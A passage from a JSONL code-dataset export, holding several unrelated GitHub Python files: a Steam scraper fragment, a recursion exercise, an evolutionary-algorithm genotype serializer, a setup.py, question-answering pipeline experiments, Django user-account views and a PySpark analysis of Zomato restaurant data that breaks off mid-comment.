tree_info.xpath('//*[@class=\"game_area_details_specs learning_about\"]')\n steam_learning = 0\n if len(learning_about) > 0:\n steam_learning = 1\n\n new_item_dict = {\n 'game_id': app_id,\n 'name': app_name,\n 'request_status': 'Package',\n 'game_title': game_title,\n 'developer': developer,\n 'developer_count': developer_count,\n 'publisher': publisher,\n 'publisher_count': publisher_count,\n 'franchiser': franchiser,\n 'franchiser_count': franchiser_count,\n 'release_date': release_date,\n 'description_title': description_title,\n 'description_long': description_long,\n 'price': price_,\n 'feature': feature,\n 'feature_count': feature_count,\n 'steam_learning': steam_learning,\n 'language': language,\n 'language_count': language_count}\n return new_item_dict","repo_name":"zhengyanzhao1997/Steam-optimal_distinctiveness-anly","sub_path":"craw_data_code/craw_stem_game_info/content_func.py","file_name":"content_func.py","file_ext":"py","file_size_in_byte":21249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"10317179190","text":"'''Write a recursive function called raise_power() that takes in two \ninteger parameters, the first parameter being the base number and the second \nparameter being the power you want to raise it to. This function will return the number \nraised to the given power. For example, if you called raise_power(4, 2) you would get 16 \nreturned which is 4^2. Remember to think about what the base and recursive cases will be and \nstart with an iterative approach if you don't know where to begin. 
'''\n\ndef raise_power(base, power):\n #base case: if the power is 1, the result is the base itself.\n if (power == 1):\n return base\n else:\n #recursive case: if the power is greater than 1, multiply by the base and reduce the power by 1 until it reaches 1\n return (base * raise_power(base, power-1))\n\n\nprint(raise_power(4,2)) #expect to see 16\n","repo_name":"xingY97/Trees-Sorting","sub_path":"quiz_problem.py","file_name":"quiz_problem.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35372597765","text":"from __future__ import annotations\n\nfrom dataclasses import dataclass\nfrom random import Random\nfrom typing import List\n\nimport sqlalchemy\nfrom item import Item\nfrom phenotype import Phenotype\nfrom sqlalchemy.ext.asyncio.session import AsyncSession\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.future import select\n\nfrom revolve2.core.database import IncompatibleError, Serializer\n\n\n@dataclass\nclass Genotype:\n items: List[bool]\n\n\ndef random(rng: Random, has_item_prob: float, num_items: int) -> Genotype:\n return Genotype([rng.random() < has_item_prob for _ in range(num_items)])\n\n\ndef develop(genotype: Genotype, items: List[Item], maximum_weight: float) -> Phenotype:\n phenotype = []\n total_weight = 0\n for has_item, item in zip(genotype.items, items):\n if has_item and total_weight + item.weight < maximum_weight:\n phenotype.append(True)\n total_weight += item.weight # accumulate carried weight so the capacity check is cumulative (bug fix)\n else:\n phenotype.append(False)\n\n return Phenotype(phenotype)\n\n\nclass GenotypeSerializer(Serializer[Genotype]):\n @classmethod\n async def create_tables(cls, session: AsyncSession) -> None:\n await (await session.connection()).run_sync(DbGenotype.metadata.create_all)\n\n @classmethod\n def identifying_table(cls) -> str:\n return DbGenotype.__tablename__\n\n @classmethod\n async def to_database(\n cls, session: AsyncSession, objects: List[Genotype]\n ) -> List[int]:\n dbobjects = [\n DbGenotype(items=\"\".join([\"1\" if x else \"0\" for x in g.items]))\n for g in objects\n ]\n session.add_all(dbobjects)\n await session.flush()\n ids = [\n dbfitness.id for dbfitness in dbobjects if dbfitness.id is not None\n ] # cannot be none because not nullable. 
check if only there to silence mypy.\n assert len(ids) == len(objects) # but check just to be sure\n return ids\n\n @classmethod\n async def from_database(\n cls, session: AsyncSession, ids: List[int]\n ) -> List[Genotype]:\n rows = (\n (await session.execute(select(DbGenotype).filter(DbGenotype.id.in_(ids))))\n .scalars()\n .all()\n )\n\n if len(rows) != len(ids):\n raise IncompatibleError()\n\n id_map = {t.id: t for t in rows}\n items_str = [id_map[id].items for id in ids]\n items_bool = [[item == \"1\" for item in items] for items in items_str]\n return [Genotype(items) for items in items_bool]\n\n\nDbBase = declarative_base()\n\n\nclass DbGenotype(DbBase):\n __tablename__ = \"genotype\"\n\n id = sqlalchemy.Column(\n sqlalchemy.Integer,\n nullable=False,\n unique=True,\n autoincrement=True,\n primary_key=True,\n )\n items = sqlalchemy.Column(sqlalchemy.String, nullable=False)\n","repo_name":"8Mile313/EC_Robot_Parkour","sub_path":"revolve2-master/examples/simple_optimization/genotype.py","file_name":"genotype.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"28229536798","text":"import setuptools\nimport inspect\nimport sys\nimport os\nimport re\n\nREQUIREMENTS_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"env\", \"requirements.txt\")\nwith open(REQUIREMENTS_PATH) as f:\n REQUIREMENTS = f.read().splitlines()\n\nif not hasattr(setuptools, 'find_namespace_packages') or not inspect.ismethod(setuptools.find_namespace_packages):\n print(\"Your setuptools version:'{}' does not support PEP 420 (find_namespace_packages). \"\n \"Upgrade it to version >='40.1.0' and repeat install.\".format(setuptools.__version__))\n sys.exit(1)\n\nVERSION_PATH = os.path.join(os.path.dirname(__file__), \"VERSION.txt\")\nwith open(VERSION_PATH, \"r\") as version_file:\n VERSION = version_file.read().strip()\n\n# Read long description from README.\nREADME_PATH = os.path.join(os.path.abspath(os.path.dirname(__file__)), \"README.md\")\nwith open(README_PATH) as readme_file:\n README = re.sub(\n \".*\",\n \"\",\n readme_file.read(),\n flags=re.S | re.M,\n )\n\n\nsetuptools.setup(\n name='quantum-image-classifier',\n version=VERSION,\n description='Quatum image classifier: A library of different quantum algorithms used to classify images',\n long_description=README,\n long_description_content_type=\"text/markdown\",\n url='https://github.com/jorgevazquezperez/Quantum-image-classifier',\n author='Jorge Vázquez Pérez',\n author_email='jorge.vazper@gmail.com',\n #license='Apache-2.0',\n classifiers=[\n \"Environment :: Console\",\n \"License :: OSI Approved :: Apache Software License\",\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX :: Linux\",\n \"Programming Language :: Python :: 3.10\",\n \"Topic :: Scientific/Engineering\"\n ],\n keywords='qiskit quantum machine learning ml centroids',\n packages=[\n \"quantum_image_classifier\", \n \"quantum_image_classifier.classifier_algorithms\", \n \"quantum_image_classifier.encoding\", \n \"quantum_image_classifier.gates\",\n \"quantum_image_classifier.data_treatment\",\n \"quantum_image_classifier.CESGA_connection\",\n \"quantum_image_classifier.visuals\" ],\n install_requires=REQUIREMENTS,\n include_package_data=True,\n python_requires=\"<3.10\",\n 
zip_safe=False\n)","repo_name":"jorgevazquezperez/Quantum-image-classifier","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2444,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"6174487869","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Aug 2 01:02:14 2020\n\n@author: shyambhu.mukherjee\n\"\"\"\n\nimport pdfminer\nimport io\nfrom pdfminer.layout import LAParams\nfrom pdfminer import high_level\nfrom pdfminer.high_level import extract_text_to_fp as extex\n\ndef extract_raw_text(pdf_filename):\n output = io.StringIO()\n laparams = LAParams() \n # Using the defaults seems to work fine\n\n with open(pdf_filename, \"rb\") as pdffile:\n extex(pdffile, output, laparams=laparams)\n\n return output.getvalue()\ntext1 = \"\"\n#text1 = extract_raw_text('/home/shyambhu.mukherjee/Downloads/duckett.pdf')\ntext2 = extract_raw_text('/home/shyambhu.mukherjee/Downloads/html_tutorial.pdf')\ntext_collated = text1 + text2\n\nf = open('html_corpus.txt','w')\nf.write(text_collated)\nf.close()\n\ndef summary_utils(summary):\n summar = summary[0]['summary_text']\n return summar\n\nf = open('html_corpus.txt','r')\nfultext = f.read()\n#bart-large-cnn model\nimport transformers\nfrom transformers import pipeline\nqaObj = pipeline('question-answering')\nans = qaObj(question = \"write html code for red button\",context = fultext)\n\"\"\"\n{'score': 0.05844178717584647,\n 'start': 56248,\n 'end': 56269,\n 'answer': '405 Language Codes:'}\n\"\"\"\nans = qaObj(question = \"create button\",context = fultext)\n\"\"\"\n{'score': 0.9545003905971328,\n 'start': 74361,\n 'end': 74385,\n 'answer': 'height Numeric Value'}\n\"\"\"\nans = qaObj(question = \"write paragraph tag\",context = fultext)\n\"\"\"\nsame answer as before.\n\"\"\"\nans = qaObj(question = \"paragraph tag\",context = fultext)\n\n## code example from w3school\nsmall_text = r\"\"\"A paragraph always starts on a new line, and is usually a block of text.\n HTML Paragraphs\n The HTML
<p>
element defines a paragraph.\n A paragraph always starts on a new line, and browsers automatically add some white space (a margin) before and after a paragraph.\n Example
<p>
This is a paragraph.
</p>
\n
<p>
This is another paragraph.
</p>
\n HTML Display\n You cannot be sure how HTML will be displayed.\n Large or small screens, and resized windows will create different results.\n With HTML, you cannot change the display by adding extra spaces or extra lines in your HTML code.\n The browser will automatically remove any extra spaces and lines when the page is displayed:\n Example
<p>
This paragraph contains a lot of lines in the source code, \n but the browser ignores it.
</p>
<p>
This paragraph contains \n a lot of spaces in the source code, but the browser ignores it.
</p>
\n \"\"\"\n \nans = qaObj(question = \"write paragraph tag\", context = small_text)\n\"\"\"{'score': 0.27491484847131886,\n 'start': 90,\n 'end': 131,\n 'answer': 'HTML Paragraphs The HTML'}\n\"\"\"\nans = qaObj(question = \"what element is a paragraph tag\", context = small_text)\n\"\"\"\n{'score': 0.5403857393915423, 'start': 127, 'end': 131, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what defines a pararaph\",context = small_text)\n\"\"\"\n{'score': 0.47865264802688756,\n 'start': 90,\n 'end': 143,\n 'answer': 'HTML Paragraphs The HTML
<p>
        element'}\n\"\"\"\n\ngeeks_text = open('geeks_para.txt','r').read()\nans = qaObj(question = \"what defines a paragraph\",context = geeks_text)\n\"\"\"\n{'score': 0.8452085668869813, 'start': 24, 'end': 28, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what tag defines a paragraph\",context = geeks_text)\n\"\"\"\n{'score': 0.864106661039159, 'start': 24, 'end': 28, 'answer': 'HTML'}\n\"\"\"\nans = qaObj(question = \"what is a paragraph tag?\",context = geeks_text)\n\"\"\"\n{'score': 0.12643090688080516,\n 'start': 61,\n 'end': 90,\n 'answer': 'both opening and closing tag.'}\n\"\"\"","repo_name":"shyamcody/nlp-experiments","sub_path":"book_bart_combination.py","file_name":"book_bart_combination.py","file_ext":"py","file_size_in_byte":3770,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"38972842802","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.contrib import messages\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.forms import model_to_dict\nfrom restaurant.utils import get_filtered_restaurants, restaurants_to_dict\nfrom django.core.paginator import Paginator\n\nfrom .models import (\n User_Profile,\n Review,\n Comment,\n DineSafelyUser,\n Report_Ticket_Comment,\n Report_Ticket_Review,\n Preferences,\n UserActivityLog,\n Restaurant,\n Email,\n)\n\nfrom restaurant.models import Categories\nimport json\n\n# from django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom django.shortcuts import render, redirect\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.contrib.auth.tokens import PasswordResetTokenGenerator\nfrom django.contrib.auth import get_user_model\nfrom django.utils.encoding import force_text\nfrom django.http import HttpResponse, HttpResponseBadRequest, HttpResponseRedirect\n\n\nfrom .utils import (\n send_reset_password_email,\n send_verification_email,\n send_feedback_email,\n send_verification_secondary_email,\n)\n\nfrom .forms import (\n UserCreationForm,\n UserProfileCreationForm,\n ResetPasswordForm,\n UpdatePasswordForm,\n GetEmailForm,\n UserPreferenceForm,\n ContactForm,\n ProfileUpdateForm,\n AddUserEmailForm,\n)\n\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\ndef user_login(request):\n if request.user.is_authenticated:\n return redirect(\"index\")\n if request.method == \"POST\":\n form = AuthenticationForm(request=request, data=request.POST)\n if form.is_valid():\n username = form.cleaned_data.get(\"username\")\n password = form.cleaned_data.get(\"password\")\n user = authenticate(username=username, password=password)\n logger.info(\"valid\")\n if user is not None:\n login(request, user)\n return redirect(\"user:register\")\n\n # Check if the user is active or not.\n for error in form.errors.as_data()[\"__all__\"]:\n if \"This account is inactive.\" in error:\n user = get_user_model().objects.get(username=form.data[\"username\"])\n send_verification_email(request, user.email)\n return render(\n request=request, template_name=\"sent_verification_email.html\"\n )\n else:\n form = AuthenticationForm()\n return render(request, template_name=\"login.html\", context={\"form\": form})\n\n\ndef register(request):\n if request.user.is_authenticated:\n return redirect(\"index\")\n if request.method == \"POST\":\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.is_active = False\n user.save()\n\n form2 = 
UserProfileCreationForm(user=user, data=request.POST)\n form2.save()\n\n send_verification_email(request, form.cleaned_data.get(\"email\"))\n return render(request=request, template_name=\"sent_verification_email.html\")\n else:\n form = UserCreationForm()\n return render(\n request=request, template_name=\"register.html\", context={\"form\": form}\n )\n\n\ndef show_report(request):\n if not request.user.is_staff:\n messages.warning(request, \"You are not authorized to do so.\")\n return redirect(\"user:profile\")\n\n internal_reviews = list(\n Report_Ticket_Review.objects.all()\n .select_related(\"user\")\n .select_related(\"review\")\n .values(\n \"id\",\n \"review_id\",\n \"reason\",\n \"time\",\n \"user__id\",\n \"user__username\",\n \"review__content\",\n \"review__image1\",\n \"review__image2\",\n \"review__image3\",\n )\n )\n\n internal_comments = list(\n Report_Ticket_Comment.objects.all()\n .select_related(\"user\")\n .select_related(\"comment\")\n .values(\n \"id\",\n \"comment_id\",\n \"reason\",\n \"time\",\n \"user__id\",\n \"user__username\",\n \"comment__text\",\n )\n )\n\n return render(\n request=request,\n template_name=\"admin_comment.html\",\n context={\n \"internal_reviews\": internal_reviews,\n \"internal_comments\": internal_comments,\n },\n )\n\n\n# @login_required()\ndef user_facing(request, user_id):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n user = DineSafelyUser.objects.get(pk=user_id)\n user_profile = User_Profile.objects.get(user=user)\n favorite_restaurant_list = user.favorite_restaurants.all()\n user_pref_list = user.preferences.all()\n user_pref_list_json = []\n internal_reviews = list(\n Review.objects.filter(user=user)\n .order_by(\"-time\")\n .all()[:50]\n .values(\n \"user\",\n \"user__username\",\n \"user__user_profile__photo\",\n \"id\",\n \"rating\",\n \"rating_safety\",\n \"rating_door\",\n \"rating_table\",\n \"rating_bathroom\",\n \"rating_path\",\n \"time\",\n \"content\",\n \"image1\",\n \"image2\",\n \"image3\",\n \"restaurant__restaurant_name\",\n \"restaurant__yelp_detail__img_url\",\n \"restaurant__id\",\n )\n )\n for pref in user_pref_list:\n pref_dic = model_to_dict(pref)\n user_pref_list_json.append(pref_dic)\n category_pref = user.preferences.filter(preference_type=\"category\")\n neighbourhood_pref = user.preferences.filter(preference_type=\"neighbourhood\")\n rating_pref = user.preferences.filter(preference_type=\"rating\")\n compliance_pref = user.preferences.filter(preference_type=\"compliance\")\n price_pref = user.preferences.filter(preference_type=\"price\")\n user_pref = [\n category_pref,\n neighbourhood_pref,\n rating_pref,\n compliance_pref,\n price_pref,\n ]\n return render(\n request=request,\n template_name=\"facing_page.html\",\n context={\n \"favorite_restaurant_list\": favorite_restaurant_list,\n \"user_pref\": user_pref,\n \"user_pref_json\": json.dumps(user_pref_list_json, cls=DjangoJSONEncoder),\n \"user_profile\": user_profile,\n \"profile_pic\": \"\" if user_profile is None else user_profile.photo,\n \"internal_reviews\": json.dumps(internal_reviews, cls=DjangoJSONEncoder),\n \"facing_page_user_id\": user.username,\n },\n )\n\n\n# @login_required()\ndef user_reviews(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n user = request.user\n internal_reviews = list(\n Review.objects.filter(user=user)\n .order_by(\"-time\")\n .all()[:50]\n .values(\n \"user\",\n \"user__username\",\n \"user__user_profile__photo\",\n \"id\",\n \"rating\",\n 
\"rating_safety\",\n \"rating_door\",\n \"rating_table\",\n \"rating_bathroom\",\n \"rating_path\",\n \"time\",\n \"content\",\n \"image1\",\n \"image2\",\n \"image3\",\n \"restaurant__restaurant_name\",\n \"restaurant__yelp_detail__img_url\",\n \"restaurant__id\",\n \"hidden\",\n )\n )\n return render(\n request=request,\n template_name=\"profile_review.html\",\n context={\n \"internal_reviews\": json.dumps(internal_reviews, cls=DjangoJSONEncoder),\n \"user_id\": request.user.id,\n },\n )\n\n\n# @login_required()\ndef post_logout(request):\n logout(request)\n return redirect(\"user:login\")\n\n\n# @login_required()\ndef profile(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n\n user = request.user\n if request.method == \"POST\":\n if \"submit-add-email-form\" in request.POST:\n form = AddUserEmailForm(user, request.POST)\n if form.is_valid():\n form.save()\n send_verification_secondary_email(\n request, form.cleaned_data.get(\"email\")\n )\n messages.success(\n request,\n \"We have sent further instructions to your email. \"\n + \"Please follow the steps for verifying your email.\",\n )\n return redirect(\"user:profile\")\n else:\n for field in form:\n for error in field.errors:\n messages.error(request, error)\n elif \"submit-delete-email-form\" in request.POST:\n user_email = Email.objects.filter(\n user=user, email=request.POST[\"email\"]\n ).first()\n if user_email:\n user_email.delete()\n return redirect(\"user:profile\")\n elif \"primary_email\" in request.POST:\n user_email = Email.objects.filter(user=user, active=True).first()\n if user_email:\n user.email = user_email.email\n user.save()\n user_email.delete()\n return redirect(\"user:profile\")\n else:\n messages.error(\n request,\n \"You do not have other active emails. 
\"\n + \"Please add/activate one before deleting primary email.\",\n )\n else:\n form = ProfileUpdateForm(user=user, data=request.POST)\n if form.is_valid():\n if \"profile-pic\" in request.FILES:\n profile_pic = form.save_image(request.FILES[\"profile-pic\"])\n User_Profile.objects.update_or_create(\n user=user, defaults={\"photo\": profile_pic}\n )\n else:\n default_profile_pic = (\n \"https://s3-media3.fl.yelpcdn.com\"\n \"/photo/O8CmQtEeOUvMTFk0iMn5sw/o.jpg\"\n )\n profile_pic_src = request.POST[\"profile-pic-src\"]\n if profile_pic_src == default_profile_pic:\n User_Profile.objects.update_or_create(\n user=user, defaults={\"photo\": None}\n )\n form.save()\n return redirect(\"user:profile\")\n user_profile = User_Profile.objects.get(user=user)\n favorite_restaurant_list = user.favorite_restaurants.all()\n user_pref_list = user.preferences.all()\n user_pref_list_json = []\n for pref in user_pref_list:\n pref_dic = model_to_dict(pref)\n user_pref_list_json.append(pref_dic)\n category_pref = user.preferences.filter(preference_type=\"category\")\n neighbourhood_pref = user.preferences.filter(preference_type=\"neighbourhood\")\n rating_pref = user.preferences.filter(preference_type=\"rating\")\n compliance_pref = user.preferences.filter(preference_type=\"compliance\")\n price_pref = user.preferences.filter(preference_type=\"price\")\n categories = Preferences.objects.filter(preference_type=\"category\")\n neighbourhoods = Preferences.objects.filter(preference_type=\"neighbourhood\")\n user_pref = [\n category_pref,\n neighbourhood_pref,\n rating_pref,\n compliance_pref,\n price_pref,\n ]\n user_emails = Email.objects.filter(user=user)\n\n return render(\n request=request,\n template_name=\"profile.html\",\n context={\n \"favorite_restaurant_list\": favorite_restaurant_list,\n \"user_pref_json\": json.dumps(user_pref_list_json, cls=DjangoJSONEncoder),\n \"user_profile\": user_profile,\n \"profile_pic\": \"\" if user_profile is None else user_profile.photo,\n \"categories\": categories,\n \"neighbourhoods\": neighbourhoods,\n \"user_pref\": user_pref,\n \"user_emails\": user_emails,\n },\n )\n\n\n# view the viewing history\ndef view_history(request, page):\n viewed_restaurants = []\n if request.user.is_authenticated:\n user_activity = UserActivityLog.objects.filter(user=request.user)\n # get viewed restaurants\n for idx in range(user_activity.count()):\n viewed_restaurants.append(user_activity[idx].restaurant)\n viewed_restaurants = restaurants_to_dict(viewed_restaurants)\n # Add last visit date\n for idx in range(user_activity.count()):\n viewed_restaurants[idx][\"last_visit\"] = user_activity[idx].last_visit.date()\n page_obj = Paginator(viewed_restaurants, 8).get_page(page)\n # add restaurants to context\n context = {\n \"total_restaurant_count\": len(viewed_restaurants),\n \"page_obj\": page_obj,\n }\n return render(request, \"view_history.html\", context=context)\n\n\ndef delete_viewed_restaurant(request, business_id):\n if request.method == \"POST\":\n if request.user.is_authenticated:\n user = request.user\n # current restaurant we want to delete\n restaurant_to_delete = Restaurant.objects.filter(\n business_id=business_id\n ).first()\n # delete activity log\n UserActivityLog.objects.filter(\n user=user, restaurant=restaurant_to_delete\n ).first().delete()\n return HttpResponse(\"Restaurant Removed\")\n\n\ndef clear_viewed_restaurants(request):\n if request.method == \"POST\" and request.user.is_authenticated:\n UserActivityLog.objects.filter(user=request.user).delete()\n return 
HttpResponse(\"Restaurants Cleared\")\n\n\ndef reset_password_link(request, base64_id, token):\n if request.method == \"POST\":\n\n uid = force_text(urlsafe_base64_decode(base64_id))\n\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n form = ResetPasswordForm(request.POST)\n if form.is_valid():\n form.save(uid)\n return redirect(\"user:login\")\n else:\n return HttpResponse(\"Invalid\")\n else:\n form = ResetPasswordForm()\n return render(\n request=request, template_name=\"reset.html\", context={\"form\": form}\n )\n\n\ndef verify_user_link(request, base64_id, token):\n uid = force_text(urlsafe_base64_decode(base64_id))\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n user.is_active = True\n user.save()\n\n return redirect(\"user:login\")\n\n\ndef verify_email_link(request, base64_id, base64_email, token):\n uid = force_text(urlsafe_base64_decode(base64_id))\n user = get_user_model().objects.get(pk=uid)\n if not user or not PasswordResetTokenGenerator().check_token(user, token):\n return HttpResponse(\"This is invalid!\")\n email = force_text(urlsafe_base64_decode(base64_email))\n user_email = Email.objects.filter(user=user, email=email).first()\n if not user_email:\n return HttpResponse(\"This is invalid!\")\n user_email.active = True\n user_email.save()\n messages.success(request, \"Your email \" + email + \" has been activated!\")\n return redirect(\"user:profile\")\n\n\ndef forget_password(request):\n if request.method == \"POST\":\n form = GetEmailForm(request.POST)\n if form.is_valid():\n send_reset_password_email(request, form.cleaned_data.get(\"email\"))\n return render(request=request, template_name=\"sent_email.html\")\n return render(\n request=request, template_name=\"reset_email.html\", context={\"form\": form}\n )\n else:\n form = GetEmailForm()\n return render(\n request=request, template_name=\"reset_email.html\", context={\"form\": form}\n )\n\n\ndef add_preference(request):\n if request.method == \"POST\":\n form = UserPreferenceForm(request.POST)\n if form.is_valid():\n form.save(user=request.user)\n return HttpResponse(\"Preference Saved\")\n return HttpResponseBadRequest(\"Bad Request\")\n\n\ndef delete_preference(request, preference_type, value):\n if request.method == \"POST\":\n user = request.user\n user.preferences.remove(\n Preferences.objects.filter(\n preference_type=preference_type, value=value\n ).first()\n )\n logger.info(\n \"Removed preference {}: {} for {}\".format(preference_type, value, user)\n )\n return HttpResponse(\"Preference Removed\")\n\n\ndef update_password(request):\n if not request.user.is_authenticated:\n return redirect(\"user:login\")\n\n user = request.user\n if request.method == \"POST\":\n form = UpdatePasswordForm(user=user, data=request.POST)\n if form.is_valid():\n form.save(user)\n return redirect(\"user:login\")\n\n error_list = []\n for field in form:\n for error in field.errors:\n error_list.append(error)\n context = {\"status\": \"400\", \"errors\": error_list}\n response = HttpResponse(json.dumps(context), content_type=\"application/json\")\n response.status_code = 400\n return response\n\n\ndef contact_form(request):\n if request.method == \"POST\":\n form = ContactForm(request.POST)\n if form.is_valid():\n email = form.cleaned_data.get(\"email\")\n subject = 
form.cleaned_data.get(\"subject\")\n message = form.cleaned_data.get(\"message\")\n # Sends user answers to website email\n feedback_sent = send_feedback_email(request, email, subject, message)\n if feedback_sent:\n return redirect(\"user:request_received\")\n else:\n messages.error(request, \"An error occurred, feedback was not sent!\")\n else:\n messages.error(request, \"Invalid or missing data in contact form!\")\n form = ContactForm()\n return render(\n request=request, template_name=\"contact_us.html\", context={\"form\": form}\n )\n\n\ndef request_received(request):\n return render(request=request, template_name=\"request_received.html\")\n","repo_name":"gcivil-nyu-org/spring2021-cs-gy-9223-class","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16851980191","text":"\nimport findspark\nfindspark.init()\n\n\nimport pyspark\nfrom pyspark import SparkContext, SQLContext\nfrom pyspark.sql import SparkSession\nspark = pyspark.sql.SparkSession.builder \\\n .config(\"spark.driver.maxResultSize\", \"2g\")\\\n .getOrCreate()\n\n\nfrom main import *\n\n\nfrom pyspark.sql.functions import *\nfrom pyspark.sql.types import *\n\nrestaurant_schema = StructType([\n StructField('Restaurant_Name', StringType(), True),\n StructField('City', StringType(), True),\n StructField('Restaurant_ID', IntegerType(), False),\n StructField('Has_Table_booking', StringType(), True),\n StructField('Has_Online_delivery', StringType(), True),\n StructField('Is_delivering_now', StringType(), True),\n StructField('Country_Code', IntegerType(), False)\n ])\n\nfoods_schema = StructType([\n StructField('Country_Code', IntegerType(), False),\n StructField('Cuisines', StringType(), False),\n StructField('Rating', FloatType(), False),\n StructField('Rating_text', StringType(), False),\n StructField('Votes', IntegerType(), False)\n \n ])\n\n\ncost_schema = StructType([\n StructField('Cost_per_person', IntegerType(), False),\n StructField('Currency', StringType(), True),\n StructField('Price_range', IntegerType(), False),\n StructField('Country_Code', IntegerType(), False)\n ])\n\ncountry_schema = StructType([\n StructField('Country_Code', IntegerType(), False),\n StructField('Country', StringType(), True),\n StructField('Per_Capita_Income(USD)', IntegerType(), False)\n ])\n\ncost_new_schema = StructType([\n StructField('Cost_per_person', IntegerType(), False),\n StructField('Currency', StringType(), True),\n StructField('Price_range', IntegerType(), False),\n StructField('Country_Code', IntegerType(), False),\n StructField('Cost_USD', FloatType(), False)\n ])\n\n\n#Restaurant.write.format('csv').option('header',True).mode('overwrite').option('sep',',').save(\"hdfs://localhost:9000/fuse_project/Restaurant.csv\")\n#print(\"Data Written\")\n\nRestaurant=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Restaurant.csv\", header=True, schema = restaurant_schema )\nFoods=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Foods.csv\", header=True, schema = foods_schema)\nCost=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Cost.csv\", header=True, schema = cost_schema)\nCountry=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Country.csv\" , header=True, schema = country_schema)\nCost_new=spark.read.csv(\"hdfs://localhost:9000/fuse_project/Zomato_project/Cost_new.csv\" , header=True, schema = 
cost_new_schema)\n\n\n\nFoods=Foods.select(\"Country_Code\",\"Rating\",\"Rating_text\",\"Votes\",split(col(\"Cuisines\"),\",\").alias(\"Cuisine\"))\n#Foods.show()\n\n\n#Loading dataframes into Postgres database\n\n\n\n\n# # 1. Cities with maximum Restaurants\ndef task1():\n    task1= Restaurant.groupBy(\"City\").count().sort(col(\"count\").desc())\n    return task1\n\n\n\n# # 2. Which cuisine is famous (most ordered) in Ahmedabad city?\n\ndef task2():\n    task2= Restaurant.join(Foods, Restaurant.Country_Code== Foods.Country_Code,\"inner\").select(\"City\",\"Cuisine\",\"Rating_text\")\n\n    task21=task2.filter(task2.City==\"Ahmedabad\")\n#task21.show(2,truncate=False)\n\n    task22 = task21.select(task21.City,explode(task21.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n\n\n    task23=task22.groupBy(\"Cuisine\").count().distinct().sort(col(\"count\").desc())\n    return task23\n# OR\n\n# task_22=task21.filter(task21.Rating_text == \"Excellent\")\n#task_22.show()\n\n\n#task_23 = task_22.select(task_22.Rating_text,explode(task_22.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n#task_23.groupBy(\"Cuisine\").count().sort(col(\"count\").desc()).show()\n\n\n\n# # 3. How does per capita income affect food ordering behaviour?\ndef task3():\n    task3= Foods.join(Country,\"Country_Code\",\"inner\")\n    task31= Country.select(max(\"Per_Capita_Income(USD)\"), min(\"Per_Capita_Income(USD)\"))\n#task31.show()\n\n#Analysing behaviour of customers with the highest per capita income (68309): what kinds of food do they order?\n\n    task3= task3.withColumnRenamed(\"Per_Capita_Income(USD)\",\"PCI\")\n\n    task33= task3.filter(task3.PCI==68309).select(task3.Country,task3.PCI,task3.Rating,explode(task3.Cuisine)).withColumnRenamed(\"col\",\"Cuisine\")\n    return task33\n\n# # 4. Restaurants with maximum (high) ratings (Excellent rating and >= 4.9)?\n\ndef task4():\n    task4= Restaurant.join(Foods, \"Country_Code\",\"inner\").select(\"Restaurant_Name\",\"Rating\", \"Rating_text\")\n#task4.show()\n\n\n    task41=task4.filter(task4.Rating_text==\"Excellent\").distinct()\n\n\n    task42=task41.filter(task41.Rating >= 4.9).distinct()\n    return task42\n\n\n# # 5. How do votes affect the price range?\n\ndef task5():\n    task5= Foods.join(Cost, \"Country_Code\",\"inner\")\n#task5.show()\n\n    task52=task5.select(max(\"Votes\"), min(\"Votes\"))\n    task53=task5.filter(task5.Votes==10934).select(\"Votes\",\"Price_range\")\n\n    return task53\n\n\n# # 6. Top 5 most popular ratings by count?\n\ndef task6():\n    task6=Foods.select(\"Rating\")\n    task6= task6.filter(task6.Rating<=5.0).groupBy(\"Rating\").count().sort(col(\"count\").desc())\n#task6.show(5)\n    return task6\n\n\n    \n# # 7. 
